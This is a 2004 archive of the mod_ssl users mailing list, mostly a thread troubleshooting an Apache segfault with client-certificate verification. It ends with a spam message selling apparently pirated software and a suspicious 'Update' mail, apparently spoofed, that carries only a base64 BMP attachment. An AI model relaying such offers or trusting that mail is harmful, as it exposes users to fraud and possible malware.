Delivered-To: modssl-users@modssl.org
Received: from web51304.mail.yahoo.com (web51304.mail.yahoo.com [206.190.38.170])
	by master.modssl.org (Postfix) with SMTP id 65A91A8939
	for ; Tue, 29 Jun 2004 23:32:06 +0200 (CEST)
Message-ID: <20040629213153.23323.qmail@web51304.mail.yahoo.com>
Received: from [194.185.97.55] by web51304.mail.yahoo.com via HTTP; Tue, 29 Jun 2004 23:31:53 CEST
Date: Tue, 29 Jun 2004 23:31:53 +0200 (CEST)
From: =?iso-8859-1?q?Fulvio=20LAZ?= 
Subject: Problem with SSLVerifyClient
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Fulvio=20LAZ?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Dear Sirs
I write to ask for a little help about a problem with Apache configuration.
 
My system is: Apache-AdvancedExtranetServer/2.0.48 (Mandrake Linux/6mdk) mod_ssl/2.0.48
OpenSSL/0.9.7c PHP/4.3.4
 
I want read client distinguished name into php page (client using browser with pkcs12
certificate inside),
so I add the following lines into /etc/httpd/conf.d/41_mod_ssl.default-vhost.conf
 
 SSLCertificateFile /etc/grid-security/tomcatcert.pem
 SSLCertificateKeyFile /etc/grid-security/tomcatkey.pem.plain
 SSLCACertificateFile /etc/grid-security/certificates/33b4aee4.0
 SSLVerifyClient require
 
 
When I try to contact http server in https mode, connection is refuse and in 
ssl_error_log a see "[notice] child pid 11835 exit signal Segmentation fault (11)"
 
Could someone help me?
 
Thanks
Fulvio Lazzarato
 











	

	
		
____________________________________________________________
Yahoo! Companion - Scarica gratis la toolbar di Ricerca di Yahoo! 
http://companion.yahoo.it
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  1 12:15:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A373A895D; Thu,  1 Jul 2004 12:15:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60705.mail.yahoo.com (web60705.mail.yahoo.com [216.109.117.228])
	by master.modssl.org (Postfix) with SMTP id 254D5A893D
	for ; Thu,  1 Jul 2004 12:15:01 +0200 (CEST)
Message-ID: <20040701101448.30031.qmail@web60705.mail.yahoo.com>
Received: from [62.129.121.32] by web60705.mail.yahoo.com via HTTP; Thu, 01 Jul 2004 03:14:48 PDT
Date: Thu, 1 Jul 2004 03:14:48 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Problem with SSLVerifyClient
To: modssl-users@modssl.org
In-Reply-To: <20040629213153.23323.qmail@web51304.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--- Fulvio LAZ  wrote:
> 
> 
> Dear Sirs
> I write to ask for a little help about a problem
> with Apache configuration.
>  
> My system is: Apache-AdvancedExtranetServer/2.0.48
> (Mandrake Linux/6mdk) mod_ssl/2.0.48
> OpenSSL/0.9.7c PHP/4.3.4
>  
> I want read client distinguished name into php page
> (client using browser with pkcs12
> certificate inside),
> so I add the following lines into
> /etc/httpd/conf.d/41_mod_ssl.default-vhost.conf
>  
>  SSLCertificateFile
> /etc/grid-security/tomcatcert.pem
>  SSLCertificateKeyFile
> /etc/grid-security/tomcatkey.pem.plain
>  SSLCACertificateFile
> /etc/grid-security/certificates/33b4aee4.0
>  SSLVerifyClient require
>  
>  
> When I try to contact http server in https mode,
> connection is refuse and in 
> ssl_error_log a see "[notice] child pid 11835 exit
> signal Segmentation fault (11)"
>  
> Could someone help me?
>  
> Thanks
> Fulvio Lazzarato
>  

First of all does it work if you comment the
"SSLVerifyClient require"
 directive out. Also do you get a core file and can
you do a backtrace in gdb (with lib info)?

Regards
Matt


		
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  1 22:50:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AECADA8A8B; Thu,  1 Jul 2004 22:50:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51308.mail.yahoo.com (web51308.mail.yahoo.com [206.190.38.174])
	by master.modssl.org (Postfix) with SMTP id 40C3CA8A85
	for ; Thu,  1 Jul 2004 22:50:43 +0200 (CEST)
Message-ID: <20040701205030.93458.qmail@web51308.mail.yahoo.com>
Received: from [194.185.97.55] by web51308.mail.yahoo.com via HTTP; Thu, 01 Jul 2004 22:50:30 CEST
Date: Thu, 1 Jul 2004 22:50:30 +0200 (CEST)
From: =?iso-8859-1?q?Fulvio=20LAZ?= 
Subject: Re: Problem with SSLVerifyClient
To: modssl-users@modssl.org
In-Reply-To: <20040701101448.30031.qmail@web60705.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Fulvio=20LAZ?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> First of all does it work if you comment the
> "SSLVerifyClient require"
>  directive out. Also do you get a core file and can
> you do a backtrace in gdb (with lib info)?
> 
> Regards
> Matt
> 
> 
Dear Matt, thanks for your reply 

If I set "SSLVerifyClient optional" (or comment it) apache work but client CA aren't send to my
server (I need client distinguished name)

If I set "LogLevel debug" and "SSLVerifyClient require" I can see into "error_log":

[info] Server built: Mar 16 2004 15:30:28
[debug] prefork.c(1037): AcceptMutex: pthread (default: pthread)
[notice] child pid 18934 exit signal Segmentation fault (11)

and into "ssl_error_log"
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 read client hello A                    
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 write server hello A
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 write certificate A                    
[debug] ssl_engine_kernel.c(1170): handing out temporary 1024 bit DH key
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 write key exchange A                   
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 write certificate request A
[debug] ssl_engine_kernel.c(1786): OpenSSL: Loop: SSLv3 flush data                             
[debug] ssl_engine_io.c(1499): OpenSSL: read 5/5 bytes from BIO#818ab68 [mem: 81921e8] (BIO dump
 follows)                                                                                         
                        [debug] ssl_engine_io.c(1446): +------------------------------+           
                                                                                                  
  [debug] ssl_engine_io.c(1471): | 0000: 16 03 00 04 c9         |                                 
                                                                               [debug]
ssl_engine_io.c(1477): +------------------------------+                                           
                                                                     [debug]
ssl_engine_io.c(1499): OpenSSL: read 1225/1225 bytes from BIO#818ab68 [mem: 81921ed] (BI
O dump follows)
.............
.............



	

	
		
____________________________________________________________
Yahoo! Companion - Scarica gratis la toolbar di Ricerca di Yahoo! 
http://companion.yahoo.it
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul  1 22:57:19 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D6916A895D; Thu,  1 Jul 2004 22:57:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 7DD6AA8945
	for ; Thu,  1 Jul 2004 22:57:03 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i61Kume1015819;
	Thu, 1 Jul 2004 16:56:48 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i61Kul010337;
	Thu, 1 Jul 2004 16:56:47 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i61Kul7m019821;
	Thu, 1 Jul 2004 21:56:47 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i61KukKf019820;
	Thu, 1 Jul 2004 21:56:46 +0100
Date: Thu, 1 Jul 2004 21:56:46 +0100
From: Joe Orton 
To: Fulvio LAZ 
Cc: modssl-users@modssl.org
Subject: Re: Problem with SSLVerifyClient
Message-ID: <20040701205646.GA19806@redhat.com>
Mail-Followup-To: Fulvio LAZ ,
	modssl-users@modssl.org
References: <20040701101448.30031.qmail@web60705.mail.yahoo.com> <20040701205030.93458.qmail@web51308.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20040701205030.93458.qmail@web51308.mail.yahoo.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jul 01, 2004 at 10:50:30PM +0200, Fulvio LAZ wrote:
> If I set "LogLevel debug" and "SSLVerifyClient require" I can see into "error_log":
> 
> [info] Server built: Mar 16 2004 15:30:28
> [debug] prefork.c(1037): AcceptMutex: pthread (default: pthread)
> [notice] child pid 18934 exit signal Segmentation fault (11)

Is this with 2.0.49?  There's a known segfault in the 2.0.49 mod_ssl - 
upgrade to 2.0.50.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  2 09:45:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C72BA895D; Fri,  2 Jul 2004 09:45:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51302.mail.yahoo.com (web51302.mail.yahoo.com [206.190.38.168])
	by master.modssl.org (Postfix) with SMTP id 939BCA8958
	for ; Fri,  2 Jul 2004 09:44:52 +0200 (CEST)
Message-ID: <20040702074439.79644.qmail@web51302.mail.yahoo.com>
Received: from [194.185.97.55] by web51302.mail.yahoo.com via HTTP; Fri, 02 Jul 2004 09:44:39 CEST
Date: Fri, 2 Jul 2004 09:44:39 +0200 (CEST)
From: =?iso-8859-1?q?Fulvio=20LAZ?= 
Subject: Re: Problem with SSLVerifyClient
To: modssl-users@modssl.org
In-Reply-To: <20040701205646.GA19806@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Fulvio=20LAZ?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Someone know were I can find apache2-mod_ssl 2.50 ?

Thanks
Fulvio




	

	
		
____________________________________________________________
Yahoo! Companion - Scarica gratis la toolbar di Ricerca di Yahoo! 
http://companion.yahoo.it
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  2 12:09:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D3B30A8A4F; Fri,  2 Jul 2004 12:09:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60708.mail.yahoo.com (web60708.mail.yahoo.com [216.109.117.231])
	by master.modssl.org (Postfix) with SMTP id 73769A8A53
	for ; Fri,  2 Jul 2004 12:09:16 +0200 (CEST)
Message-ID: <20040702100900.80811.qmail@web60708.mail.yahoo.com>
Received: from [62.129.121.32] by web60708.mail.yahoo.com via HTTP; Fri, 02 Jul 2004 03:09:00 PDT
Date: Fri, 2 Jul 2004 03:09:00 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Problem with SSLVerifyClient
To: modssl-users@modssl.org
In-Reply-To: <20040701205030.93458.qmail@web51308.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You dont need the hash link for the
SSLCACertificateFile just put the real filename in.

Also are you using a root and intermediate cert, then
add "SSLVerifyDepth  2".

Upgrading may be a good idea but I have "Apache/2.0.48
(Unix) mod_ssl/2.0.48 OpenSSL/0.9.7c" running with
client cert auth. But then thats RH on i386 (custom
compile).

 SSLCACertificateFile
/etc/grid-security/certificates/33b4aee4.0
 SSLVerifyClient require
 

--- Fulvio LAZ  wrote:
> 
> > First of all does it work if you comment the
> > "SSLVerifyClient require"
> >  directive out. Also do you get a core file and
> can
> > you do a backtrace in gdb (with lib info)?
> > 
> > Regards
> > Matt
> > 
> > 
> Dear Matt, thanks for your reply 
> 
> If I set "SSLVerifyClient optional" (or comment it)
> apache work but client CA aren't send to my
> server (I need client distinguished name)
> 
> If I set "LogLevel debug" and "SSLVerifyClient
> require" I can see into "error_log":
> 
> [info] Server built: Mar 16 2004 15:30:28
> [debug] prefork.c(1037): AcceptMutex: pthread
> (default: pthread)
> [notice] child pid 18934 exit signal Segmentation
> fault (11)
> 
> and into "ssl_error_log"
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 read client hello A                    
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 write server hello A
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 write certificate A                    
> [debug] ssl_engine_kernel.c(1170): handing out
> temporary 1024 bit DH key
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 write key exchange A                   
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 write certificate request A
> [debug] ssl_engine_kernel.c(1786): OpenSSL: Loop:
> SSLv3 flush data                             
> [debug] ssl_engine_io.c(1499): OpenSSL: read 5/5
> bytes from BIO#818ab68 [mem: 81921e8] (BIO dump
>  follows)                                           
>                                              
>                         [debug]
> ssl_engine_io.c(1446):
> +------------------------------+           
>                                                     
>                                              
>   [debug] ssl_engine_io.c(1471): | 0000: 16 03 00 04
> c9         |                                 
>                                                     
>                           [debug]
> ssl_engine_io.c(1477):
> +------------------------------+                    
>                       
>                                                     
>                 [debug]
> ssl_engine_io.c(1499): OpenSSL: read 1225/1225 bytes
> from BIO#818ab68 [mem: 81921ed] (BI
> O dump follows)
> .............
> .............
> 
> 
> 
> 	
> 
> 	
> 		
>
____________________________________________________________
> Yahoo! Companion - Scarica gratis la toolbar di
> Ricerca di Yahoo! 
> http://companion.yahoo.it
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________
Do you Yahoo!?
Read only the mail you want - Yahoo! Mail SpamGuard.
http://promotions.yahoo.com/new_mail 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From kkmcutlojfggxd@web.de  Fri Jul  2 16:50:48 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from adsl-68-74-104-43.dsl.klmzmi.ameritech.net (adsl-68-74-104-43.dsl.klmzmi.ameritech.net [68.74.104.43])
	by master.modssl.org (Postfix) with SMTP id BD533A8A4F
	for ; Fri,  2 Jul 2004 16:50:29 +0200 (CEST)
Received: from 50.115.40.210 by 68.74.104.43; Fri, 02 Jul 2004 19:39:00 +0400
Message-ID: 
From: "Harriet Sullivan" 
Reply-To: "Harriet Sullivan" 
To: modssl-users-l@master.modssl.org
Subject: Win 2000, XP, Office, Adobe and Corel stuff for 90% less from Larson's SoftShop
Date: Fri, 02 Jul 2004 19:38:00 +0400
MIME-Version: 1.0
Content-Type: multipart/alternative; charset=iso-8859-1;
	boundary="--6668740806583568"

This is a multi-part message in MIME format.

----6668740806583568
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

One sees great things from the valley only small things from the peak.
An ounce of action is worth a ton of theory.
A big man has no time really to do anything but just sit and be big.
They that sow in tears shall reap joy. [Psalms 126:5]
Action may not always bring happiness but there is no happiness without action.
We are often deterred from crime by the disgrace of others.
Nobody can be successful if he doesn't love his work, love his job.
Words may show a man's wit but actions his meaning.
Books are like a mirror. If an ass looks in, you can't expect an angel to look out.
God may forgive your sins, but your nervous system won t.
The most important part of education is proper training in the nursery.
Ah just act the way ah feel.
Our work is the presentation of our capabilities.
What makes a hero truly great is that they never despair.
----6668740806583568
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7Bit

israeli supernatant carborundum communique chieftain lambert castle woven floorboard stamen pier caress strut slot biconcave lash aircraft fargo inertial congressional peafowl clement placate schwab inflammatory strident apron caldwell asunder checksummed firehouse springfield deify hummel encore fairway Looking for cheap high-quality software?
 We might have just what you need.
 
 Adobe PhotoShop CS 8.0 (1 cd)
 AutoCAD 2005 (1 cd)
 Microsoft Office System Professional 2003 (5 cds)
 Microsoft Windows XP PRO SP1 Corpoarte Edition +
 OFFICE SYSTEM PROFESSIONAL V2003 MICROSOFT OFFICE 11 2 in 1 on (1 cd)
 Adobe Acrobat 6.0 Professional
 DVDXCopy Platinum 4.0.38
 Adobe Illustrator CS 11.0 (2 cds)
 Autocad 2004
 Adobe Creative Suite Premium (5 cds)
 Macromedia Studio MX 2004 (1 cd)
 Microsoft Office XP Professional with SP2
 Cool Edit Pro v2.1
 Microsoft Office Publisher 2003 (1 cd)
 Corel Draw 12 Graphic Suite (3 cds)
 OmniForm Premium 5.0
 Adobe PageMaker 7.01
 Microsoft Office v.X for Mac
 QuarkXPress Fonts Collection
 Norton Internet Security Pro 2004 (1 cd)
 Ulead PhotoImpact XL (1 cd)
 
 and lots more here

----6668740806583568--


From owner-modssl-users@modssl.org  Mon Jul  5 11:33:14 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 87D21A8A57; Mon,  5 Jul 2004 11:33:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maximo.net (ae11814.emirates.net.ae [217.164.54.36])
	by master.modssl.org (Postfix) with SMTP id 2F6C4A8A4B
	for ; Mon,  5 Jul 2004 11:33:10 +0200 (CEST)
Date: Mon, 05 Jul 2004 13:30:52 +0400
To: "Modssl-users" 
From: "Rse" 
Subject: Update
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------szfluzaepvkgvdcswwas"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------szfluzaepvkgvdcswwas
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------szfluzaepvkgvdcswwas
Content-Type: image/bmp; name="qqpvlqmczq.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="qqpvlqmczq.bmp"
Content-ID: 

Qk2GEAAAAAAAADYAAAAoAAAAcwAAABIAAAABABAAAAAAAFAQAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+AfIB8
/3//f/9//3//f/9//39af4l9iX32foB8gHz/f95/k36AfIB8L369f95/k36AfIB8L369f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f4B8gHz/f/9//3+TfoB8gHzUfv9//3+9f+19
gHztfVp//3//f71/cX6AfIl99n7/f/9//3//f/9/gHyAfP9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/gHyAfP9//3//f/9//3//f/9/iX2AfL1/OH+AfIB8/38vfoB8vX/ef4B8
7X0vfoB8vX/ef4B87X3/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+AfIB8/3//fxd/
gHw4fzh/gHz2fv9/k36AfL1/OH+AfJx//38vfoB8vX84f4B81H7/f/9//3//f4B8gHz/f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f4B8gHz/f/9//3//f/9//3//f4B8gHz/f/9/
gHyAfP9//3//f3t/1H6AfIl9/3//f3t/1H6AfIl9/3//f/9//3//f4B8gHyAfP9//3//f/9/
gHyAfIB8gHyAfIB8/38vfoB8/3//f4B8L37/f/9//3//f/9/gHyTfv9//3//f/9//3+AfIl9
/3//f/9//3+AfIB8/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+AfIB8/3//f/9/
/3//f/9//39af4B8k369f4B8gHz/f1p/iX2AfIB8iX1af1p/iX2AfIB8iX1af/9//3//f/9/
/3//f/9//3//f/9//3//f3F+Wn//f4B8gHz/f/9/gHyAfP9//3+AfIB8/3//f/9//3//f4B8
iX3/f/9//3//f/9/gHyAfP9//3//f/9/gHyAfP9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/gHyAfIB8gHyAfNR+/3//f/9//3+cf/Z+L36AfIB8/3+JfYB8L35af/9//3+JfYB8
L35af/9//3//f/9//3//f/9//3//f/9//3//f/9//397f3F+/3+AfIB8/3//f4B8gHz/f/9/
gHyAfP9//39xfoB8cX7tfYB8/3//f/9//3//f4B8iX3/f/9//3//f4B8gHz/f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f4B8gHz/f/9/F3+AfNR+/3//fy9+e3//f71/gHyJff9/
7X2AfP9/vX+AfC9+7X2AfP9/vX+AfC9+/3//f/9//3//f/9//3//f/9//3//f/9//3/tfZx/
gHyAfP9//3+AfIB8/3//f4B8gHz/f5N+gHx7f5x/gHyAfP9/cX6AfL1/OH+AfNR+/3//f/9/
/3+AfIB8/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+AfIB8/3//f/9/gHyAfP9/
/3+9f3F+gHyAfO19e3//f71/L36AfIB8cX69f71/L36AfIB8cX69f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/Wn/UfoB8gHz/f/9/gHyAfP9//3+AfIB8/3+AfIB8/3//f4B8gHz/f3F+
gHyJfYB8cX7/f/9//39xfv9/gHyAfP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
gHyAfP9//3//f4B8gHz/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/7X2AfIB8/3//fy9+gHz/f/9/gHwvfv9/
gHyAfP9//3+AfHF+/38Xf4B8Wn//f/9//3//f/9/gHwvfoB8gHz/f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f4B8gHz/f/9/OH+AfJN+/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fzh/gHyAfP9/
/3/2foB8OH84f4B89n7/f9R+gHycfzh/gHwXf/9/e3+AfJN+/3//f/9//3//f71/cX6AfIB8
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+AfIB8gHyAfIB8k37/f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f4l9gHz/f/9//3/UfoB8gHzUfv9//3//f9R+gHyJffZ+/3//f95/gHyAfIB8
gHyAfP9//3//f/9/k36AfP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AAP9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
